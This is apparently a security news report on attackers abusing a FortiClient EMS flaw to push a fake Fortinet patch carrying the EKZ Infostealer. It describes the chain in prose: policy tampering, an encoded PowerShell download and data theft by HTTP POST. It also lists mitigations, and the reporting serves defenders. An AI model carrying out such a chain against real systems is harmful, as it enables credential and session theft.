Critical FortiClient EMS Vulnerability Abused to Spread EKZ Infostealer via Fake Update Campaigns

A critical security vulnerability in FortiClient Endpoint Management Server (EMS) is being actively exploited by threat actors to distribute a newly identified credential-stealing malware known as EKZ Infostealer. The attacks leverage trusted management infrastructure to silently deploy malicious payloads across enterprise endpoints, raising serious concerns for organizations using Fortinet’s endpoint management platform.

Security researchers report that the flaw, tracked as CVE-2026-35616, has already been patched, but exploitation continues in environments that have not yet applied the latest updates.

How Attackers Exploit the FortiClient EMS Flaw

Cybersecurity firm Arctic Wolf revealed that attackers are abusing a pre-authentication API access bypass in FortiClient EMS that can lead to privilege escalation. Once access is gained, attackers can manipulate endpoint management configurations without authentication.

This allows them to push malicious scripts and commands directly through the EMS console, effectively turning enterprise management infrastructure into a malware distribution system.

The attack chain typically involves:

• Gaining unauthorized access through the EMS vulnerability
• Modifying endpoint management and remote access policies
• Inserting malicious scripts into trusted update channels
• Executing payloads across all connected endpoints

Fake Fortinet Update Used to Deliver Infostealer

Once inside the system, attackers deploy malware disguised as legitimate Fortinet updates. The payload is delivered through PowerShell and executed silently on targeted endpoints.

A malicious executable named “FortiEndpoint_Patch.exe” is used as part of the campaign. It masquerades as an official security update while functioning as an information-stealing tool.

The malware is designed to harvest sensitive data, including:

• Saved browser passwords
• Session cookies
• Autofill data such as credit card details, addresses, and phone numbers

Targeted browsers include both Chromium-based and Gecko-based applications.

Abuse of Legitimate FortiClient Components

Researchers found that attackers also abuse legitimate FortiClient components, including fortitray.exe, to execute malicious scripts. This trusted binary is used to launch a .cmd file, which then triggers a Base64-encoded PowerShell command.

The PowerShell script performs several actions:

1. Downloads the malicious payload
2. Executes the credential-stealing malware
3. Exfiltrates stolen data to a remote server via HTTP POST requests

The data is transmitted to an attacker-controlled IP address, while logs are stored locally in system directories before being sent out.

Configuration Tampering Expands Attack Scope

Beyond malware deployment, attackers also modify EMS configurations to maintain persistence and expand their control over enterprise environments. Observed changes include:

• Disabling or delaying firmware update notifications
• Altering remote access profiles
• Injecting malicious scripts into endpoint policies

These changes allow attackers to silently distribute malware across all managed systems without requiring individual compromise of each device.

Security analysts warn that once EMS is compromised, every connected endpoint becomes vulnerable to secondary attacks.

Data Theft and Credential Risks

The EKZ Infostealer focuses heavily on credential theft and sensitive user data extraction. Once installed, it collects and stores harvested information locally before exfiltration.

Stolen data may enable attackers to:

• Access corporate cloud services
• Compromise internal business applications
• Bypass multi-factor authentication through session cookie reuse
• Move laterally across enterprise networks

Security experts emphasize that session hijacking techniques significantly increase the risk of persistent unauthorized access.

Broader Impact and Attack Strategy

The attack demonstrates a growing trend in which threat actors target endpoint management platforms rather than individual devices. By compromising centralized administration tools, attackers can scale malware deployment across entire organizations.

Arctic Wolf notes that the observed campaign uses trusted management pathways to blend malicious activity with legitimate administrative operations, making detection significantly more difficult.

Mitigation and Security Recommendations

Fortinet has addressed the vulnerability in FortiClient EMS version 7.4.7 and later, and organizations are strongly advised to update immediately.

Security experts recommend the following protective measures:

• Upgrade FortiClient EMS to the latest patched version
• Restrict administrative access to EMS consoles
• Monitor for unauthorized configuration changes
• Audit endpoint policy modifications and script deployments
• Block suspicious PowerShell activity tied to EMS processes

Organizations are also urged to review logs for unusual update behavior or unexpected endpoint script execution.

Conclusion

The exploitation of FortiClient EMS highlights how attackers increasingly weaponize trusted enterprise management systems to distribute malware at scale. By combining privilege escalation flaws with legitimate administrative tools, threat actors are able to bypass traditional defenses and deploy credential-stealing payloads across entire networks.

As exploitation continues in unpatched environments, rapid patch adoption and strict EMS access controls remain critical to preventing widespread compromise.